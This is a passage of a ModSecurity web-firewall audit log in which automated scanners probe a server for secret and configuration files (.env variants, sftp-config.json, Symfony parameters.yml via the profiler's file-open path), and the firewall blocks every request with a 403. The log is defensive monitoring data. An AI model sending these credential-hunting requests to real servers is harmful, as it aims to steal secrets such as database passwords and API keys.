http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36 Accept: */* --fbe3a76d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fbe3a76d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745483654897902 820 (- - -) Stopwatch2: 1745483654897902 820; combined=370, p1=330, p2=0, p3=0, p4=0, p5=40, sr=121, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fbe3a76d-Z-- --d6596e2f-A-- [24/Apr/2025:15:34:15 +0700] aAn3h95yz20UX9VrdZM2JQAAAEQ 103.236.140.4 46856 103.236.140.4 8181 --d6596e2f-B-- POST /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 216.73.161.136 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 216.73.161.136 X-Forwarded-Proto: http Connection: close Content-Length: 13 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36 Accept: */* Content-Type: application/x-www-form-urlencoded --d6596e2f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d6596e2f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745483655885057 835 (- - -) Stopwatch2: 1745483655885057 835; combined=359, p1=318, p2=0, p3=0, p4=0, p5=40, sr=77, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d6596e2f-Z-- --e64ecb04-A-- [24/Apr/2025:15:34:16 +0700] aAn3iN5yz20UX9VrdZM2JwAAAEg 103.236.140.4 46862 103.236.140.4 8181 --e64ecb04-B-- GET /.env.prod HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 173.239.211.251 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 173.239.211.251 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Accept: */* --e64ecb04-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e64ecb04-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745483656867782 679 (- - -) Stopwatch2: 1745483656867782 679; combined=256, p1=223, p2=0, p3=0, p4=0, p5=33, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e64ecb04-Z-- --e4da3632-A-- [24/Apr/2025:15:34:18 +0700] aAn3islQo524fhbIj1zduAAAAAk 103.236.140.4 46872 103.236.140.4 8181 --e4da3632-B-- POST /.env.prod HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 216.73.161.119 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 216.73.161.119 X-Forwarded-Proto: http Connection: close Content-Length: 13 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:106.0) Gecko/20100101 Firefox/106.0 Accept: */* Content-Type: application/x-www-form-urlencoded --e4da3632-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e4da3632-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745483658346872 816 (- - -) Stopwatch2: 1745483658346872 816; combined=351, p1=310, p2=0, p3=0, p4=0, p5=41, sr=106, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e4da3632-Z-- --48059328-A-- [24/Apr/2025:15:34:19 +0700] aAn3i_iVYlyO1xhz7yMVUgAAAMI 103.236.140.4 46874 103.236.140.4 8181 --48059328-B-- GET /.env.production HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 216.73.161.136 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 216.73.161.136 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36 Accept: */* --48059328-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --48059328-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745483659153876 718 (- - -) Stopwatch2: 1745483659153876 718; combined=286, p1=245, p2=0, p3=0, p4=0, p5=40, sr=66, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --48059328-Z-- --3454d27f-A-- [24/Apr/2025:15:34:20 +0700] aAn3jMlQo524fhbIj1zduQAAAA0 103.236.140.4 46880 103.236.140.4 8181 --3454d27f-B-- POST /.env.production HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 216.73.161.113 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 216.73.161.113 X-Forwarded-Proto: http Connection: close Content-Length: 13 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36 Accept: */* Content-Type: application/x-www-form-urlencoded --3454d27f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3454d27f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745483660236176 767 (- - -) Stopwatch2: 1745483660236176 767; combined=328, p1=289, p2=0, p3=0, p4=0, p5=38, sr=84, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3454d27f-Z-- --e7412f48-A-- [24/Apr/2025:15:34:21 +0700] aAn3jfiVYlyO1xhz7yMVUwAAAMU 103.236.140.4 46886 103.236.140.4 8181 --e7412f48-B-- GET /redmine/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 173.239.211.235 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 173.239.211.235 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36 Accept: */* --e7412f48-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e7412f48-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745483661055875 838 (- - -) Stopwatch2: 1745483661055875 838; combined=382, p1=346, p2=0, p3=0, p4=0, p5=36, sr=139, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e7412f48-Z-- --46b4f76b-A-- [24/Apr/2025:15:34:22 +0700] aAn3jslQo524fhbIj1zdvAAAABc 103.236.140.4 46892 103.236.140.4 8181 --46b4f76b-B-- POST /redmine/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 173.239.211.238 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 173.239.211.238 X-Forwarded-Proto: http Connection: close Content-Length: 13 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:105.0) Gecko/20100101 Firefox/105.0 Accept: */* Content-Type: application/x-www-form-urlencoded --46b4f76b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --46b4f76b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745483662266661 834 (- - -) Stopwatch2: 1745483662266661 834; combined=342, p1=306, p2=0, p3=0, p4=0, p5=35, sr=118, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --46b4f76b-Z-- --13cf3130-A-- [24/Apr/2025:15:34:23 +0700] aAn3j8lQo524fhbIj1zdvQAAABU 103.236.140.4 46898 103.236.140.4 8181 --13cf3130-B-- GET /__tests__/test-become/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 216.73.161.112 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 216.73.161.112 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:105.0) Gecko/20100101 Firefox/105.0 Accept: */* --13cf3130-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --13cf3130-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745483663283899 766 (- - -) Stopwatch2: 1745483663283899 766; combined=285, p1=248, p2=0, p3=0, p4=0, p5=37, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --13cf3130-Z-- --f3cf9806-A-- [24/Apr/2025:15:34:24 +0700] aAn3kMlQo524fhbIj1zdvwAAABE 103.236.140.4 46908 103.236.140.4 8181 --f3cf9806-B-- POST /__tests__/test-become/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 216.73.161.116 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 216.73.161.116 X-Forwarded-Proto: http Connection: close Content-Length: 13 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36 Accept: */* Content-Type: application/x-www-form-urlencoded --f3cf9806-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f3cf9806-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745483664826623 846 (- - -) Stopwatch2: 1745483664826623 846; combined=313, p1=276, p2=0, p3=0, p4=0, p5=36, sr=75, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f3cf9806-Z-- --1e92687e-A-- [24/Apr/2025:15:34:56 +0700] aAn3sN5yz20UX9VrdZM2NQAAAEc 103.236.140.4 47078 103.236.140.4 8181 --1e92687e-B-- GET /sftp-config.json HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 173.239.211.250 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 173.239.211.250 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36 Accept: */* --1e92687e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1e92687e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/sftp-config.json" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745483696716740 765 (- - -) Stopwatch2: 1745483696716740 765; combined=293, p1=259, p2=0, p3=0, p4=0, p5=34, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1e92687e-Z-- --b9bd4b37-A-- [24/Apr/2025:15:35:23 +0700] aAn3y2Luk3f9kLjsdTbwsQAAAIg 103.236.140.4 47232 103.236.140.4 8181 --b9bd4b37-B-- GET /app_dev.php/_profiler/open?file=app/config/parameters.yml HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 216.73.161.121 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 216.73.161.121 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36 Accept: */* --b9bd4b37-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b9bd4b37-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/config/parameters.yml" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745483723598120 774 (- - -) Stopwatch2: 1745483723598120 774; combined=322, p1=286, p2=0, p3=0, p4=0, p5=36, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b9bd4b37-Z-- --7493386e-A-- [24/Apr/2025:15:35:24 +0700] aAn3zGLuk3f9kLjsdTbwsgAAAII 103.236.140.4 47234 103.236.140.4 8181 --7493386e-B-- GET /_profiler/open?file=app/config/parameters.yml HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 173.239.211.251 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 173.239.211.251 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Accept: */* --7493386e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7493386e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/config/parameters.yml" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745483724504120 763 (- - -) Stopwatch2: 1745483724504120 763; combined=331, p1=292, p2=0, p3=0, p4=0, p5=39, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7493386e-Z-- --4ecf1a0d-A-- [24/Apr/2025:15:35:25 +0700] aAn3zWLuk3f9kLjsdTbwtAAAAIc 103.236.140.4 47244 103.236.140.4 8181 --4ecf1a0d-B-- GET /app/config/parameters.yml HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 216.73.161.120 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 216.73.161.120 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:106.0) Gecko/20100101 Firefox/106.0 Accept: */* --4ecf1a0d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4ecf1a0d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/config/parameters.yml" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745483725916782 776 (- - -) Stopwatch2: 1745483725916782 776; combined=385, p1=289, p2=0, p3=0, p4=0, p5=96, sr=126, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4ecf1a0d-Z-- --19a19f3d-A-- [24/Apr/2025:15:35:26 +0700] aAn3zmLuk3f9kLjsdTbwtgAAAI8 103.236.140.4 47252 103.236.140.4 8181 --19a19f3d-B-- GET /config/parameters.yml HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 173.239.211.240 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 173.239.211.240 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36 Accept: */* --19a19f3d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --19a19f3d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/config/parameters.yml" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745483726857313 757 (- - -) Stopwatch2: 1745483726857313 757; combined=296, p1=261, p2=0, p3=0, p4=0, p5=35, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --19a19f3d-Z-- --afb5f76c-A-- [24/Apr/2025:15:52:43 +0700] aAn722Luk3f9kLjsdTbxuAAAAJY 103.236.140.4 51224 103.236.140.4 8181 --afb5f76c-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 178.128.207.219 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 178.128.207.219 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --afb5f76c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --afb5f76c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745484763587154 739 (- - -) Stopwatch2: 1745484763587154 739; combined=311, p1=275, p2=0, p3=0, p4=0, p5=36, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --afb5f76c-Z-- --2245a31d-A-- [24/Apr/2025:16:53:11 +0700] aAoKB95yz20UX9VrdZM6PQAAAE0 103.236.140.4 37502 103.236.140.4 8181 --2245a31d-B-- GET /.env.production.local HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 45.148.10.42 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 45.148.10.42 X-Forwarded-Proto: https Connection: close User-Agent: l9explore/1.2.2 --2245a31d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2245a31d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745488391681197 807 (- - -) Stopwatch2: 1745488391681197 807; combined=345, p1=302, p2=0, p3=0, p4=0, p5=42, sr=75, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2245a31d-Z-- --867b0d7c-A-- [24/Apr/2025:16:53:13 +0700] aAoKCfiVYlyO1xhz7yMZJwAAAMg 103.236.140.4 37508 103.236.140.4 8181 --867b0d7c-B-- GET /.env_sample HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 45.148.10.42 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 45.148.10.42 X-Forwarded-Proto: https Connection: close User-Agent: l9explore/1.2.2 --867b0d7c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --867b0d7c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745488393085453 730 (- - -) Stopwatch2: 1745488393085453 730; combined=338, p1=301, p2=0, p3=0, p4=0, p5=37, sr=117, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --867b0d7c-Z-- --6216ab65-A-- [24/Apr/2025:16:53:14 +0700] aAoKCviVYlyO1xhz7yMZKQAAAMs 103.236.140.4 37514 103.236.140.4 8181 --6216ab65-B-- GET /.env.dev HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 45.148.10.42 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 45.148.10.42 X-Forwarded-Proto: https Connection: close User-Agent: l9explore/1.2.2 --6216ab65-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6216ab65-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745488394461378 759 (- - -) Stopwatch2: 1745488394461378 759; combined=298, p1=263, p2=0, p3=0, p4=0, p5=35, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6216ab65-Z-- --164ca932-A-- [24/Apr/2025:16:53:15 +0700] aAoKC95yz20UX9VrdZM6PgAAAFM 103.236.140.4 37520 103.236.140.4 8181 --164ca932-B-- GET /.env.dist HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 45.148.10.42 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 45.148.10.42 X-Forwarded-Proto: https Connection: close User-Agent: l9explore/1.2.2 --164ca932-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --164ca932-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745488395163267 653 (- - -) Stopwatch2: 1745488395163267 653; combined=261, p1=228, p2=0, p3=0, p4=0, p5=33, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --164ca932-Z-- --b7b40c6d-A-- [24/Apr/2025:16:53:15 +0700] aAoKC_iVYlyO1xhz7yMZLAAAAMQ 103.236.140.4 37526 103.236.140.4 8181 --b7b40c6d-B-- GET /.env.preprod HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 45.148.10.42 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 